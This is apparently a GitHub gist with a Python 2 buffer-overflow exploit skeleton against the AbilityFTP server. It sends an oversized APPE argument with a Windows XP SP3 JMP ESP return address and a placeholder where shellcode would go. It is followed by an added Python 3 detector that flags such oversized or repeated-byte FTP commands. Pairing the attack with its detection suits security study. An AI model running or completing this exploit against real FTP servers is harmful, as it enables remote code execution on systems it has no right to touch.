@mackwage
Created August 17, 2017 02:05
AbilityFTP overflow skeleton phase 4 for xp
#!/usr/bin/python
from socket import *
import sys, struct, os, time
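host = "10.10.10.73"
port = 21

# Connect to the FTP control port and print the server banner.
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(2000)
time.sleep(2)

# Argument layout: 968 filler bytes, a 4-byte address, 528 placeholder bytes.
buffer = "\x41" * 968
buffer += "\x53\x93\x42\x7E" #7E429353 JMP ESP WinXP SP3 ENG (little-endian)
buffer += "\x43" * 528
buffer += "\r\n"
print "[+] length: %d" % (len(buffer))

# Log in, then send the oversized argument with the APPE command.
s.send('USER ftp\r\n')
print s.recv(2000)
s.send('PASS ftp\r\n')
print s.recv(2000)
s.send('APPE '+buffer)
print s.recv(2000)
print "[+] Evil sent!"
s.close()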
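
The defender's view of the same traffic, as an added example that is not part of the gist: a Python 3 check that flags FTP control-channel commands whose argument is far longer than a path should be or is mostly one repeated byte. The thresholds, function names and sample session are assumptions constructed for this example.

```python
import re

# Assumptions for this example, not values from the gist: tune to the site.
MAX_ARG_LEN = 255   # longest argument a legitimate client is expected to send
MAX_RUN_LEN = 64    # longest tolerated run of one repeated byte

# One byte followed by MAX_RUN_LEN or more copies of itself.
_RUN = re.compile(rb"(.)\1{%d,}" % MAX_RUN_LEN, re.DOTALL)


def inspect_command(line):
    """Check one client-to-server control-channel line (bytes)."""
    body = line.rstrip(b"\r\n")
    verb, _, arg = body.partition(b" ")
    findings = []
    if len(arg) > MAX_ARG_LEN:
        findings.append("oversized-argument")
    if _RUN.search(arg):
        findings.append("repeated-byte-run")
    return verb.upper().decode("ascii", "replace"), len(arg), findings


def scan_session(stream):
    """Split a captured client byte stream on CRLF and return flagged commands."""
    alerts = []
    for line in stream.split(b"\r\n"):
        if not line:
            continue
        verb, arg_len, findings = inspect_command(line)
        if findings:
            alerts.append((verb, arg_len, findings))
    return alerts


# Constructed sample: a normal login and upload, then an APPE whose argument
# has the same 968 + 4 + 528 byte layout as the request built in the gist.
SAMPLE = (
    b"USER ftp\r\nPASS ftp\r\nAPPE report.txt\r\n"
    b"APPE " + b"\x41" * 968 + b"BBBB" + b"\x43" * 528 + b"\r\n"
)

if __name__ == "__main__":
    for verb, arg_len, findings in scan_session(SAMPLE):
        print("ALERT %s arg_len=%d %s" % (verb, arg_len, ",".join(findings)))
```

The same length rule can be enforced inline by a proxy or expressed as an IDS content-length condition on FTP commands, so the request is dropped before it reaches the server.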